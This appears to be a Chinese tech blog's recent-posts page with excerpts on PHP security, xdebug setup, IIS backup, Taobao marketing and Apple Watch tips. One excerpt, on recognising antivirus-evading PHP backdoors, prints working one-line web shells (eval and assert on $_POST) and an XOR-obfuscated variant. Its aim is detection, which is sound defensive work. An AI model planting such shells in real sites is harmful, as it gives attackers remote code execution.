最近的文章列表

总结php防注入和XSS攻击通用过滤(带示例代码)

对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全。

那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips

1. 假定所有的用户输入数据都是“邪恶”的
2. 弱类型的脚本语言必须保证类型和期望的一致
3. 考虑周全的正则表达式
4. strip_tags、htmlspecialchars 这类函数很好用 <b

2015/12/10 Comments:
简单介绍php+phpStorm+xdebug配置方法

1.下载xdebug文件

http://xdebug.org/wizard.php

将phpinfo()的源代码复制到文本框中,xdebug会提示如何配置和下载哪个版本的xdebug。

全部下载地址:

http://www.xdebug.org/download.php

2.配置php.ini,在末尾加上。

2015/12/9 Comments:
如何识别简单的免查杀的PHP后门(带示例讲解)

一个最常见的一句话后门可能写作这样

<?php @eval($_POST['cmd']);?>

或这样

<?php @assert($_POST['cmd']);?>

tudouya 同学在FREEBUF上给出[一种构造技巧]利用

代码如下:

<?php  @$_++; // $_ = 1  $__=("#"^"|"); // $__ = _   $__.=("."^"~"); // _P   $__.=("/"^"`"); // _PO   $__.=("|"^"/"); // _POS   $__.=("{"^"/"); // _POST   ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  ?>
2015/12/8 Comments:
设计师如何找素材,并且避免图片侵权?

首先删除来路不明的素材,别去依赖它们。

以后要图尽量去国外网站找,我不是说国外的资源所以不会被追究,不要误解了。去国外网络找资源的原因主要2点:

  • 国外的素材,相对国内要授权方式写的清楚得多,不合理的转载+分发相对少。这也是分辨一个素材库网站靠不靠谱的重要参考点。如果一个素材库网站对每个素材有说明作者、授权协议,那十有八九是靠谱的。而国内找到的素材很容易坑着,像zcool上不少高清素材都是商用素材库里的(尽管上传的人是比较好心),有些解压后文件名带着shutterstock什么的明显就是商业素材了。
     
  • 国内网站一大特色就是原创内容少,大多都是国外收集来的资源。国外有一些拍(收费or免费)素材的摄影师,也有一些为了用免费素材or最适合的素材自己拍素材的设计师or画师,这些在国内都是很少有的。资料很丰富
2015/12/7 Comments:
教你在淘宝双12前怎么做爆款?

下半年已经接近尾声了,仅仅还有最后的一个一个半月,然而 这并不是平平常常的一个半月,其中有双12、元旦两大淘宝热卖节日。没有把握好双11的你们,跟上步伐,坐上直通车带你一起狂飙双12。

今天要给大家说的是打造爆款,为什么要打造爆款呢?爆款,顾名思义,就是引爆全场的款式,一个店铺推一个宝贝不是只想让它爆起来,更多的是让它去引流,吸引更多的买家进店选购。下面就说一个打造爆款需要注意的事项。

 一、选款:店铺在打造爆款的过程中,想必都知道选款的重要性,这关系着打造爆款能否成功。

  A)搜索选款

 这种选款方式和销量选款区别很大,销量选款看的是产品之前的数据,而搜索选款看的是产品未来的数据,我们需要根据顾客搜索热门的关键词来判定哪款产品是未来有机会成为爆款的。‘

 B)直通车选款

2015/12/4 Comments:
服务器迁移时,IIS6备份与恢复IIS的完整设置

Windows的IIS有一个非常“坑爹”的备份还原功能,和大部分备份还原不同的是,这个服务默认不支持不同电脑之间的备份还原,如果用户重装Windows的话,即使备份了IIS的相关文件,还原的时候还是提示“无效签名”,导致这个IIS无法恢复。

  实际上,如果要在不同电脑之间(或者重装Windows)备份恢复IIS,需要在备份的时候输入密码,在还原的时候也输入密码,这样恢复才能正常,而默认是不输入密码则永远也无法成功恢复IIS配置,相信很多网站管理员都被微软这个坑爹的功能耍过。

  如果你要重装系统,那么详细备份恢复IIS的步骤如下:campr.com

  一、IIS的备份

  1.在本地计算机上的 IIS 管理单元中,右键单击 Internet 信息服务下面的计算机图标。

2015/12/3 Comments:
汇总PHP概率计算函数(抽奖、抽随机数)

简单的和大家分享一下计算概率的方法,会的人不屑看,不会的人自已动动脑子也想到了。但是看着自已的博客已经这么久没更,真心疼~。粗略算下一篇只有代码的水文,会占用OSC至少十几KB的数据库空间呢,但是,一想到乱弹里的然并卵,也就释然了。

<?php

/**
* 概率计算类
* 可用于抽奖等
*/
class Probability
{
2015/12/2 Comments:
Apple Watch的watchOS 2如何更换多色模块表盘、添加农历日期挂件、自定义图片背景表盘等

9月25日消息,今日iPhone 6s/6s Plus终于要开始发售,而同样受人关注的新版Apple Watch的watchOS在9月22日正式推出,本次watchOS算是第一代Apple Watch以来第一次重大升级,本次升级给我们带来了不一样的惊喜,其中新系统增加了新颜色、表情、时间旅行、邮件回复、新表盘、支持第三方应用的原生方式运行等多项功能,好了废话就不多说了,下面跟随小编一起去看看Apple Watch的watchOS 2上的隐藏特性技巧吧!

 

watchOS 2隐藏特性
2015/12/1 Comments:
分享两种php生成静态html页面的方法

一般来说 用php转换输出html页面有两种办法 引用大虾的文章如下:

第一种:利用模板。

目前PHP的模板可以说是很多了,有功能强大的smarty,还有简单易用的smarttemplate等。它们每一种模板,都有一个获取输出内容的函数。我们生成静态页面的方法,就是利用了这个函数。用这个方法的优点是,代码比较清晰,可读性好。

这里我用smarty做例子,说明如何生成静态页:

<?php
require("smarty/Smarty.class.php");
2015/11/30 Comments:
新手开淘宝直通车必看教程(精华版)

坚持看完,必有收获!  

下面就一步一步解读直通车。

一 关键词优化设置

   开直通车首先要学会怎么选词。那么一般选词都在那些地方呢?下面一一介绍。

   1 直通车系统推荐词。

     

2015/11/27 Comments: